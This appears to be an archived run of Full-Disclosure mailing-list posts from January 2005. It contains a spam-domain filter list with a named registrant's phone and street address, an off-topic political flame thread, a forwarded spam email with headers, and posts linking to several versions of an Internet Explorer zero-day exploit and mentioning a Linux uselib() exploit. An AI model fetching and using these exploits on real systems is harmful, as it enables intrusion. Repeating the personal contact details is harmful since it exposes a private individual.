Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iQEVAwUBQeMZBbDO2aFJ9pv2AQJ98AgAsYYQ5ROYgk8Mc/Wn7MaVuGPlW0oROjgp
5XNTMxNtwXrxNVtDka2F7z1AxbL+nY1XOKEOamdWsHW/2nO1YW44bFev4nWr8yit
NTTO6lX/QmpgXZRTQ53sUiI8Hv/o+9RWFBIgNVOlN3TZ1+QDL4647rvo+cN6ue03
isWdfN5/+jo6eOlD4xSGYxR92jLM9MaljwIOYdkF8dwPtO/h0Kalh3raZm7b9zFi
wNZ8dpIyw45BwBv+3VHx5qNf48l8LkdjoOx7VqVZLM5JKRxus2Ce1gTzliwI6eMF
MXjUYkHqBxheFd79Jur+wv5dEvEobjUaqcJG+RhcNm/NdtPPfk31rA==
=Wd1Z
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] logfile spammer

From: lsi (stuartcyberdelix.net)
Date: Mon Jan 10 2005 - 19:36:45 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This character seems to be attempting to get himself near the top of
my "top referring URLs" webstats page - either to get my attention,
or - he hoped - the attention of my site visitors, who would
ordinarily be subjected to his URLs as a result of the 1000's of hits
he's generating in order to get himself there .....

..so I had to write a filter to sanitise my logfile. The filter of
course requires filter strings which I provide below, just in case
anyone else has this same problem.

Almost all the names contain this in their WHOIS record:

Registrant Contact:

   Craig Williams (cwill8orogonet.com)
   +1.5418629145
   688 Robmar Lane
   Grants Pass, OR 97527
   US

Good to see your, uh, heathly range of tastes there Craig.

www.ads-swingers.org
www.adult-finder-friend.net
www.adult-sex-personals.org
www.adult-sex-personals.us
www.adultfinderfriend.net
www.adultpersonalsboard.org
www.cheating-wives.biz
www.cheatingwives.us
www.christian-online-dating.biz
www.christian-online-dating.us
www.christian-online-personals.com
www.christian-singles-online.net
www.christiandatingonline.biz
www.christiandatingonline.us
www.christianonlinedating.biz
www.club-swingers.com
www.dating-christian.us
www.dating-jewish.com
www.dating-jewish.us
www.datingchristian.biz
www.datingchristian.net
www.datingchristian.org
www.datingchristian.us
www.datingjewish.biz
www.discrete-encounters.com
www.encounters-adult.com
www.encounters-discreet.com
www.female-drive-dysfunction.net
www.female-dysfunction.com
www.female-dysfunction.net
www.female-enhancement.biz
www.female-libido-drive.com
www.female-libido-dysfunction.com
www.female-libido-enhancement.org
www.female-libido.org
www.female-libido.us
www.female-viagra.us
www.femaledrive.com
www.femaledysfunction.com
www.femalelibido.biz
www.femalelibido.us
www.femalelibidodysfunction.com
www.femalelibidoenhancement.net
www.femaleviagra.org
www.finderadultfriend.com
www.finderfriendadult.com
www.friend-finder-adult.biz
www.friend-finder-adult.org
www.help-sleep.com
www.help-sleeping.com
www.helpsleeping.us
www.herbal-aid.com
www.herbal-sleep.com
www.herbal-sleep.net
www.herbalsleepaid.net
www.insomnia-cure.net
www.insomnia-cure.us
www.insomnia-deprivation.biz
www.insomnia-deprivation.com
www.insomnia-disorder.com
www.insomnia-disorder.org
www.insomnia-help.org
www.insomnia-help.us
www.insomnia-herbal.com
www.insomniahelp.net
www.insomniahelp.org
www.jewish-dating-online.net
www.jewish-dating-online.org
www.jewish-online-dating.us
www.jewish-personals.org
www.jewishonlinedating.biz
www.jewishpersonals.biz
www.meet-for-sex.com
www.online-dating-christian.com
www.online-personals-christian.com
www.onlinedatingchristian.com
www.personals-adult.net
www.personals-christian.com
www.personals-jewish.com
www.personals-jewish.net
www.personals-jewish.org
www.personals-sex.com
www.personals-sex.net
www.personalschristian.org
www.red-personals.org
www.sexmeetings.net
www.singles-christian.biz
www.singles-christian.org
www.singles-christian.us
www.singles-jewish.com
www.singles-jewish.net
www.singles-jewish.org
www.singleschristian.us
www.sleep-deprivation.biz
www.sleep-deprivation.us
www.sleep-disorder.us
www.sleep-disorders.biz
www.sleepcure.org
www.sleepinghelp.org
www.swingers-club.us
www.swingers-clubs.net
www.swingers-clubs.us
www.swingers-couples.com
www.swingersads.org
www.swinging-wives.org
www.swingingcouples.biz
www.swingingcouples.us
www.swingingcouplesboard.com
www.swingingwives.net
www.swingingwives.us
www.trouble-sleeping.net
www.trouble-sleeping.us
www.troublesleeping.org
www.viagrafemale.net
www.viagrafemaledrive.com

---
Stuart Udall
stuart atcyberdelix.dot net - http://www.cyberdelix.net/

---
* Origin: lsi: revolution through evolution (192:168/0.2)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] PoC to be released on 01/20/05

From: Some User (chance_useryahoo.com)
Date: Mon Jan 10 2005 - 20:13:49 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a PoC by the people! Be sure to do your part. :-)

Not One Damn Dime Day - Jan 20, 2005

Since our religious leaders will not speak out against the war in Iraq, since our political leaders don't have the moral courage to oppose it, Inauguration Day, Thursday, January 20th, 2005 is "Not One Damn Dime Day" in America.

On "Not One Damn Dime Day" those who oppose what is happening in our name in Iraq can speak up with a 24-hour national boycott of all forms of consumer spending.

During "Not One Damn Dime Day" please don't spend money. No one damn dime for gasoline. Not one damn dime for necessities or for impulse purchases. Not one damn dime for nothing for 24 hours.

On "Not One Damn Dime Day," please boycott Wal-Mart, Kmart and Target.

Please don't go to the mall or the local convenience store. Please don't buy any fast food (or any groceries at all for that matter).

For 24 hours, please do what you can to shut the retail economy down.

The object is simple. Remind the people in power that the war in Iraq is immoral and illegal; that they are responsible for starting it and that it is their responsibility to stop it.

"Not One Damn Dime Day" is to remind them, too, that they work for the people of the United States of America, not for the international corporations and K Street lobbyists who represent the corporations and funnel cash into American politics.

"Not One Damn Dime Day" is about supporting the troops. The politicians put the troops in harm's way.
Now 1,200 brave young Americans and (some estimate) 100,000 Iraqis have died. The politicians owe our troops a plan - a way to come home.

There's no rally to attend. No marching to do. No left or right wing agenda to rant about. On "Not One Damn Dime Day" you take action by doing nothing.

You open your mouth by keeping your wallet closed.

For 24 hours, nothing gets spent, not one damn dime, to remind our religious leaders and our politicians of their moral responsibility to end the war in Iraq and give America back to the people.

==> Please share this email. <==

Original sent by:
James Wong
Marsteller Interactive

---------------------------------
Do you Yahoo!?
The all-new My Yahoo! – What will yours do?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] PoC to be released on 01/20/05

From: Jason Coombs (jasoncscience.org)
Date: Mon Jan 10 2005 - 21:17:59 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> end the war in Iraq and give America back to the people.

America, like information security, belongs only to those who are
willing to work hard to hold onto it. It is accessible only to those who
understand how things really work, technically.

What you may not realize is that America has been exported. The ideals
and culture, the dream and its opportunity for realization by all
honest, hard-working citizens, no longer exists within the United States
brand way of life.

If you want your America back, you will have to relocate to the many
places in the world where it has gone to without you. America still
welcomes you, but it isn't going to save you from yourself.

Regards,

Jason Coombs
jasoncscience.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] PoC to be released on 01/20/05

From: James Patterson Wicks (pwicksoxygen.com)
Date: Mon Jan 10 2005 - 21:32:25 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

How about Read The List Charter Day.

- For 24 hours, do not create a bogus Yahoo email account and send out
questions or statements not related to network security or the full
disclosure of security issues.

- For 24 hours, do not burden serious security professionals with your
personal political opinions

- For 24 hours, close your mouth, tape your fingers and read the list
charter that clearly states "Politics should be avoided at all costs."

This is Full Disclosure. "The list was created on 9th July 2002 by Len
Rose, and is primarily concerned with security issues and their
discussion."

Since Snopes.com feels that this whole thing might be an urban legend
(http://www.snopes.com/politics/war/not1dime.asp) you might want think
about this a little more before send the message out again.

________________________________

From: full-disclosure-bounceslists.netsys.com
[mailto:full-disclosure-bounceslists.netsys.com] On Behalf Of Some User
Sent: Monday, January 10, 2005 9:14 PM
To: full-disclosurelists.netsys.com
Subject: [Full-Disclosure] PoC to be released on 01/20/05

This is a PoC by the people! Be sure to do your part. :-)

Not One Damn Dime Day - Jan 20, 2005

On "Not One Damn Dime Day" those who oppose what is happening in our
name in Iraq can speak up with a 24-hour national boycott of all forms
of consumer spending.

During "Not One Damn Dime Day" please don't spend money. No one damn
dime for gasoline. Not one damn dime for necessities or for impulse
purchases. Not one damn dime for nothing for 24 hours.

On "Not One Damn Dime Day," please boycott Wal-Mart, Kmart and Target.

Please don't go to the mall or the local convenience store. Please don't
buy any fast food (or any groceries at all for that matter).

For 24 hours, please do what you can to shut the retail economy down.

The object is simple. Remind the people in power that the war in Iraq is
immoral and illegal; that they are responsible for starting it and that
it is their responsibility to stop it.

"Not One Damn Dime Day" is to remind them, too, that they work for the
people of the United States of America, not for the international
corporations and K Street lobbyists who represent the corporations and
funnel cash into American politics.

"Not One Damn Dime Day" is about supporting the troops. The politicians
put the troops in harm's way.

Now 1,200 brave young Americans and (some estimate) 100,000 Iraqis have
died. The politicians owe our troops a plan - a way to come home.

There's no rally to attend. No marching to do. No left or right wing
agenda to rant about. On "Not One Damn Dime Day" you take action by
doing nothing.

You open your mouth by keeping your wallet closed.

For 24 hours, nothing gets spent, not one damn dime, to remind our
religious leaders and our politicians of their moral responsibility to
end the war in Iraq and give America back to the people.

==> Please share this email. <==

Original sent by:

James Wong
Marsteller Interactive

________________________________

Do you Yahoo!?
The all-new My Yahoo! <http://my.yahoo.com> - What will yours do?

This e-mail is the property of Oxygen Media, LLC. It is intended only for the person or entity to which it is addressed and may contain information that is privileged, confidential, or otherwise protected from disclosure. Distribution or copying of this e-mail or the information contained herein by anyone other than the intended recipient is prohibited. If you have received this e-mail in error, please immediately notify us by sending an e-mail to postmasteroxygen.com and destroy all electronic and paper copies of this e-mail.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] PoC to be released on 01/20/05

tuytumadreatt.net
Date: Mon Jan 10 2005 - 22:06:47 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Keep politics to a political mailing list. Besides, what America is doing in Iraq is a good thing. Its unloyal parasitic citizens like yourself that give America a bad name. If you really dont like the American freedom of speech and way of life, go live in someplace where you arent given so many freedoms. I'm sure your boycotting and talks of pointless protesting will get you executed in a heartbeat.

Paul
Greyhats Security Group
http://greyhatsecurity.org

-------------- Original message from Some User <chance_useryahoo.com>: --------------

This is a PoC by the people! Be sure to do your part. :-)

Not One Damn Dime Day - Jan 20, 2005

On "Not One Damn Dime Day" those who oppose what is happening in our name in Iraq can speak up with a 24-hour national boycott of all forms of consumer spending.

During "Not One Damn Dime Day" please don't spend money. No one damn dime for gasoline. Not one damn dime for necessities or for impulse purchases. Not one damn dime for nothing for 24 hours.

On "Not One Damn Dime Day," please boycott Wal-Mart, Kmart and Target.

Please don't go to the mall or the local convenience store. Please don't buy any fast food (or any groceries at all for that matter).

For 24 hours, please do what you can to shut the retail economy down.

The object is simple. Remind the people in power that the war in Iraq is immoral and illegal; that they are responsible for starting it and that it is their responsibility to stop it.

"Not One Damn Dime Day" is to remind them, too, that they work for the people of the United States of America, not for the international corporations and K Street lobbyists who represent the corporations and funnel cash into American politics.

"Not One Damn Dime Day" is about supporting the troops. The politicians put the troops in harm's way.
Now 1,200 brave young Americans and (some estimate) 100,000 Iraqis have died. The politicians owe our troops a plan - a way to come home.

There's no rally to attend. No marching to do. No left or right wing agenda to rant about. On "Not One Damn Dime Day" you take action by doing nothing.

You open your mouth by keeping your wallet closed.

For 24 hours, nothing gets spent, not one damn dime, to remind our religious leaders and our politicians of their moral responsibility to end the war in Iraq and give America back to the people.

==> Please share this email. <==

Original sent by:
James Wong
Marsteller Interactive

Do you Yahoo!?
The all-new My Yahoo! – What will yours do?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] PoC to be released on 01/20/05

From: J.A. Terranson (measlmfn.org)
Date: Mon Jan 10 2005 - 22:36:07 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, 11 Jan 2005 tuytumadreatt.net wrote:

> Keep politics to a political mailing list. Besides, what America is
> doing in Iraq is a good thing. Its unloyal parasitic citizens like
> yourself that give America a bad name.

No. It's morons like you who believe that any opinion which differs from
your own is somehow "disloyal". If The Other Bonehead had won the
election, and then pulled the troops out, would saying he was an idiot for
doing so till be "disloyal"?

You people need to try and use your [woefully inadequate] brains before
throwing terms like "disloyal" around.

--
Yours,

J.A. Terranson
sysadminmfn.org
0xBD4A95BF

Civilization is in a tailspin - everything is backwards, everything is
upside down- doctors destroy health, psychiatrists destroy minds, lawyers
destroy justice, the major media destroy information, governments destroy
freedom and religions destroy spirituality - yet it is claimed to be
healthy, just, informed, free and spiritual. We live in a social system
whose community, wealth, love and life is derived from alienation,
poverty, self-hate and medical murder - yet we tell ourselves that it is
biologically and ecologically sustainable.

The Bush plan to screen whole US population for mental illness clearly
indicates that mental illness starts at the top.

Rev Dr Michael Ellner
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE:[OFF TOPIC] [Full-Disclosure] PoC to be released on 01/20/05

From: Brad Griffin (b.griffincqu.edu.au)
Date: Mon Jan 10 2005 - 22:43:55 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Practice what you preach and STF up about politics ya drongo. Damn, I
got baited by a political moron wearing Rose coloured glasses.

-----Original Message-----
From: full-disclosure-bounceslists.netsys.com
[mailto:full-disclosure-bounceslists.netsys.com] On Behalf Of
tuytumadreatt.net
Sent: Tuesday, January 11, 2005 2:07 PM
To: Some User
Cc: full-disclosurelists.netsys.com
Subject: Re: [Full-Disclosure] PoC to be released on 01/20/05

Keep politics to a political mailing list. Besides, what America is
doing in Iraq is a good thing. Its unloyal parasitic citizens like
yourself that give America a bad name. If you really dont like the
American freedom of speech and way of life, go live in someplace where
you arent given so many freedoms. I'm sure your boycotting and talks of
pointless protesting will get you executed in a heartbeat.

Paul

Greyhats Security Group

http://greyhatsecurity.org

        -------------- Original message from Some User
<chance_useryahoo.com>: --------------


        This is a PoC by the people! Be sure to do your part. :-)

        Not One Damn Dime Day - Jan 20, 2005

        Since our religious leaders will not speak out against the war
in Iraq, since our political leaders don't have the moral courage to
oppose it, Inauguration Day, Thursday, January 20th, 2005 is "Not One
Damn Dime Day" in America.

        On "Not One Damn Dime Day" those who oppose what is happening in
our name in Iraq can speak up with a 24-hour national boycott of all
forms of consumer spending.

        During "Not One Damn Dime Day" please don't spend money. No one
damn dime for gasoline. Not one damn dime for necessities or for impulse
purchases. Not one damn dime for nothing for 24 hours.

        On "Not One Damn Dime Day," please boycott Wal-Mart, Kmart and
Target.

        Please don't go to the mall or the local convenience store.
Please don't buy any fast food (or any groceries at all for that
matter).

        For 24 hours, please do what you can to shut the retail economy
down.

        The object is simple. Remind the people in power that the war in
Iraq is immoral and illegal; that they are responsible for starting it
and that it is their responsibility to stop it.

        "Not One Damn Dime Day" is to remind them, too, that they work
for the people of the United States of America, not for the
international corporations and K Street lobbyists who represent the
corporations and funnel cash into American politics.

        "Not One Damn Dime Day" is about supporting the troops. The
politicians put the troops in harm's way.
        Now 1,200 brave young Americans and (some estimate) 100,000
Iraqis have died. The politicians owe our troops a plan - a way to come
home.

        There's no rally to attend. No marching to do. No left or right
wing agenda to rant about. On "Not One Damn Dime Day" you take action by
doing nothing.

        You open your mouth by keeping your wallet closed.

        For 24 hours, nothing gets spent, not one damn dime, to remind
our religious leaders and our politicians of their moral responsibility
to end the war in Iraq and give America back to the people.

        ==> Please share this email. <==

        Original sent by:
        James Wong
        Marsteller Interactive

________________________________

Do you Yahoo!?
The all-new My Yahoo! <http://my.yahoo.com/> - What will yours
do?

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] PoC to be released on 01/20/05

Valdis.Kletnieksvt.edu
Date: Mon Jan 10 2005 - 23:18:15 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Mon, 10 Jan 2005 22:36:07 CST, "J.A. Terranson" said:
>
> On Tue, 11 Jan 2005 tuytumadreatt.net wrote:
>
> > Keep politics to a political mailing list. Besides, what America is
> > doing in Iraq is a good thing. Its unloyal parasitic citizens like
> > yourself that give America a bad name.
>
>
> No. It's morons like you who believe that any opinion which differs from
> your own is somehow "disloyal". If The Other Bonehead had won the
> election, and then pulled the troops out, would saying he was an idiot for
> doing so till be "disloyal"?
>
> You people need to try and use your [woefully inadequate] brains before
> throwing terms like "disloyal" around.

Amen to that.

"To announce that we are to stand by the president right or wrong is not
only unpatriotic and servile, but it's morally treasonable to the
American public. Nothing but the truth should be spoken about him or
any one else. But it is even more important to tell the truth, pleasant
or unpleasant, about him than about any one else." -- Theodore Roosevelt

There you go. Said by one of the greatest patriots since the Revolutionary
War - and he's urging Full Disclosure. ;)

(At least *TEDDY* is on-topic here, even if non of the rest of the thread is. ;)

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Exmh version 2.5 07/13/2001

iD8DBQFB42GXcC3lWbTT17ARAlJ/AKDsno0W+ds2eJGHcHvRRp5vkIAYqwCfS3zS
WnQ3qKLYC+hD7f/FSV9sIFU=
=7N7c
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] PoC to be released on 01/20/05

From: GuidoZ (uberguidozgmail.com)
Date: Tue Jan 11 2005 - 00:53:55 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Well said, James.

It really doesn't matter if you agree or disagree with the
statements... this isn't the place for such discussions. Hiding behind
an anonymous Yahoo email address is pretty weak too. If you *really*
need to express yourself so badly, at least reveal your identity.

--
Peace. ~G

On Mon, 10 Jan 2005 22:32:25 -0500, James Patterson Wicks
<pwicksoxygen.com> wrote:
>
>
>
> How about Read The List Charter Day.
>
>
>
> - For 24 hours, do not create a bogus Yahoo email account and send out
> questions or statements not related to network security or the full
> disclosure of security issues.
>
> - For 24 hours, do not burden serious security professionals with your
> personal political opinions
>
> - For 24 hours, close your mouth, tape your fingers and read the list
> charter that clearly states "Politics should be avoided at all costs."
>
>
>
> This is Full Disclosure. "The list was created on 9th July 2002 by Len
> Rose, and is primarily concerned with security issues and their discussion."
>
>
>
> Since Snopes.com feels that this whole thing might be an urban legend
> (http://www.snopes.com/politics/war/not1dime.asp) you might want think about
> this a little more before send the message out again.
>
>
[snip]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] UPDATED: the insider exploit( = the latest ie 0day which involves SHOWMODALDIALOG)

From: Rafel Ivgi, The-Insider (theinsider012.net.il)
Date: Tue Jan 11 2005 - 02:36:32 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I forgot to tell everyone that i made an aspx version of jelmers exploit.

So lets sum it up, all the exploits to 0-day --> "The-Insider-Prototype"(as
defined by Liu) are:
1) JSP VERSION BY JELMER -
http://www.k-otik.com/exploits/07072004.IEApplicationShell.php
2) PHP VERSION BY Liu Die Yu- http://0daymon.org/monitor/insider/dir.zip
3) ASPX VERSION BY Rafel
ivgi -http://theinsider.deep-ice.com/The-Insider.zip

Greetings: Liu Die Yu, Drew Copley, Malware

Rafel Ivgi, The-Insider
Security Consultant

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Re: AV security contacts

juha-matti.laurioom.fi
Date: Tue Jan 11 2005 - 03:29:52 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

There is Open Source Vulnerability Database (OSVDB) Vendor Dictionary
available at
http://www.osvdb.org/vendor_dict.php

Common e-mail address and/or security contact is available in that list,
for example http://www.osvdb.org/vendor_dict.php?section=vendor&id=1229&c=S (Symantec).

Additionally, Secunia has their Products => Software section page
available,
http://secunia.com/product/#software

for example http://secunia.com/product/164/ (Sophos).
You can select 'Vendor' link to visit vendor's home page.
Look at 'Contact Us' etc.

However, you waited for reply to your question only three hours.
Check those lists and send your analysis to them.

Regards,
Juha-Matti
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Security Contact for Nokia Mobile phone softwares

rohitkritikalsolutions.com
Date: Tue Jan 11 2005 - 02:27:38 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi,
Does anyone know of security contact for Nokia or symbian OS?
Specifically for models 6600 and 7610.
Please reply to me directly as I am not on the list.
Thanks
Rohit
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] Interesting but suspicious possible phishing mail

From: DAN MORRILL (dan_20407msn.com)
Date: Mon Jan 10 2005 - 20:27:55 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi folks,

Got this really interesting mail in my box today, and knowing that I haven't
used that e-mail address or ordered anything on line lately. Wondering if it
might not be a phishing e-mail. Haven't seen anything like this before.
Anyone see anything similar?
r/
Dan

from : Gabrielle U. Philips, Jr <gbhclayddnoglksafe-mail.net>
Sent : Monday, January 10, 2005 10:40 PM
To : "Gabrielle U. Philips, Jr" <MickeyandSnake7titsafe-mail.net>
CC : mdamonqwest.net, mdamoreqwest.net, mdan12qwest.net,
mdan22qwest.net, mdan32qwest.net
Subject : Shipping Notification, Tracking Number : TCD461649887242ESB

MIME-Version: 1.0
Received: from msnmail2.uswest.net ([63.226.138.22]) by mc10-f38.hotmail.com
with Microsoft SMTPSVC(6.0.3790.211); Mon, 10 Jan 2005 14:45:54 -0800
Received: (qmail 72801 invoked by uid 0); 10 Jan 2005 22:45:55 -0000
Received: from unknown (63.226.138.18) by msnmail2.uswest.net with QMQP; 10
Jan 2005 22:45:55 -0000
Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -0000
Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by
mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -0000
X-Message-Info: JGTYoYF78jHm2Kmrh/becsOSGajhcE+aqhdcaXLDOFI=
Delivered-To: mdan12qwest.net
X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4
Fuz1=4Fuz2=4
Return-Path: ihgeclhtquoqdmgawab.com
X-OriginalArrivalTime: 10 Jan 2005 22:45:54.0814 (UTC)
FILETIME=[24BA71E0:01C4F766]

Content-Type: multipart/mixed;
boundary="-----mpls-cmx-12.inet.qwest.net-1105397155-56110"

Content-Type: text/plain

This email was forwarded from your previous Qwest.net email address
to your MSN email address. To discontinue email forwarding for any
future emails sent to your previous Qwest.net email address, please
contact MSN Customer Service.

Content-Type: message/rfc822
Content-Description: forwarded message
Content-Transfer-Encoding: 8bit
Content-Disposition: inline

From: Gabrielle U. Philips, Jr <gbhclayddnoglksafe-mail.net>
To: "Gabrielle U. Philips, Jr" <MickeyandSnake7titsafe-mail.net>
Cc: mdamonqwest.net, mdamoreqwest.net, mdan12qwest.net, mdan22qwest.net,
mdan32qwest.net
Subject: Shipping Notification, Tracking Number : TCD461649887242ESB
Sent: Monday, January 10, 2005 10:40 PM
MIME-Version: 1.0
Received: (qmail 56089 invoked by uid 0); 10 Jan 2005 22:45:55 -0000
Received: from 42-171-64.adsl.cust.tie.cl (200.42.171.64) by
mpls-cmx-12.inet.qwest.net with SMTP; 10 Jan 2005 22:45:42 -0000
X-DCC-Qwest.net-Metrics: mpls-cmx-12.inet.qwest.net 1210; Body=4
Fuz1=4Fuz2=4 Content-Type: multipart/alternative;
boundary="--Part_GRKDac7J6.oMXawOLoYO4"

Content-Type: text/html; format=flowed; charset=iso-8859-15
Content-Transfer-Encoding: quoted-printable

Check your status Below:

cov2pa.com/track.asp?cg=1&c=tc

The illiterate of the 21st century will not be those who cannot read and
write, but those who cannot learn, unlearn, and relearn. Alvin Toffler
Those police officers are practicing driving between the two buildings.
The illiterate of the 21st century will not be those who cannot read and
write, but those who cannot learn, unlearn, and relearn. Alvin Toffler
Haven't the photographers already disliked praying?
Few things are harder to put up with than the annoyance of a good example.
3
When people are free to do as they please, they usually imitate each other.
-Eric Hoffer (1902-1983)
Have you already loved sleeping?

Sometimes MSN E-mail will indicate that the mesasge failed to be delivered.
Please resend when you get those, it does not mean that the mail box is bad,
merely that MSN mail is over worked at the time.

_________________________________________________________________
Don’t just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

[Full-Disclosure] full-disclosure

lists.netsys.com

From: Nicolas Waisman (nicolas.waismanimmunitysec.com)
Date: Tue Jan 11 2005 - 04:11:57 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Libdisassemble is not a disassembler, just a lib. The simple disassemble it is just an example of how easy is to use it (it's a two-line assembler that shows how to incorporate it's opcode dissassembly. hence the term 'lib..dissassembly')

Nico
Immunity, Inc

> my mistake...

>short jump:
>it's JMP_Address + 2 + Second_Byte_value = Next_Instruction_Address

>shadown at twister:~/tmp$ echo -n -e "\x75\x65" > a
>shadown at twister:~/tmp$ ndisasm -b32 a
>00000000 7565 jnz 0x67
>shadown at twister:~/tmp$ ~/instalar/libdisassemble/disassemble.py a 0x0 0xff
>Disassembling file a at offset: 0x0
> 00000000: jnz 0x65

>this is where my mistake came from ;)
>thnx
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

From: Marcy Darcy (macygaspgmail.com)
Date: Tue Jan 11 2005 - 01:56:32 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I'm running a small server with the 2.6.10 kernel.

The exploit doesen't seem to be working on this kernel. Is there a way
to make sure the sistem is vulnerable or not?

#uname -a
Linux test 2.6.10 #1 SMP Mon Jan 3 10:20:00 i686 Intel(R) Pentium(R) 4
CPU 3.00GHz GenuineIntel GNU/Linux
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

RE: [Full-Disclosure] UPDATED: the insider exploit( = the latest ie0day which involves SHOWMODALDIALOG)

From: Ferruh Mavituna (ferruhmavituna.com)
Date: Tue Jan 11 2005 - 04:36:02 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

4) Classic ASP version;
http://ferruh.mavituna.com/article/?553

Ferruh Mavituna
http://ferruh.mavituna.com
PGPKey: http://ferruh.mavituna.com/pgpkey.asc

> -----Original Message-----
> From: full-disclosure-bounceslists.netsys.com
> [mailto:full-disclosure-bounceslists.netsys.com] On Behalf
> Of Rafel Ivgi, The-Insider
> Sent: Tuesday, January 11, 2005 10:37 AM
> To: bugtraqsecurityfocus.com;
> full-disclosurelists.netsys.com; NTBUGTRAQLISTSERV.NTBUGTRAQ.COM
> Subject: RE: [Full-Disclosure] UPDATED: the insider exploit(
> = the latest ie0day which involves SHOWMODALDIALOG)
>
> I forgot to tell everyone that i made an aspx version of
> jelmers exploit.
>
> So lets sum it up, all the exploits to 0-day -->
> "The-Insider-Prototype"(as defined by Liu) are:
> 1) JSP VERSION BY JELMER -
> http://www.k-otik.com/exploits/07072004.IEApplicationShell.php
> 2) PHP VERSION BY Liu Die Yu-
> http://0daymon.org/monitor/insider/dir.zip
> 3) ASPX VERSION BY Rafel
> ivgi -http://theinsider.deep-ice.com/The-Insider.zip
>
>
> Greetings: Liu Die Yu, Drew Copley, Malware
>
> Rafel Ivgi, The-Insider
> Security Consultant
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Re: [Full-Disclosure] Interesting but suspicious possible phishing mail

From: Vincent Archer (vardeny-all.com)
Date: Tue Jan 11 2005 - 04:50:41 CST

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, Jan 11, 2005 at 02:27:55AM +0000, DAN MORRILL wrote:
> Got this really interesting mail in my box today, and knowing that I
> haven't used that e-mail address or ordered anything on line lately.
> Wondering if it might not be a phishing e-mail. Haven't seen anything like
> this before. Anyone see anything similar?

No, not phishing. Just the usual spam for on-line meds.

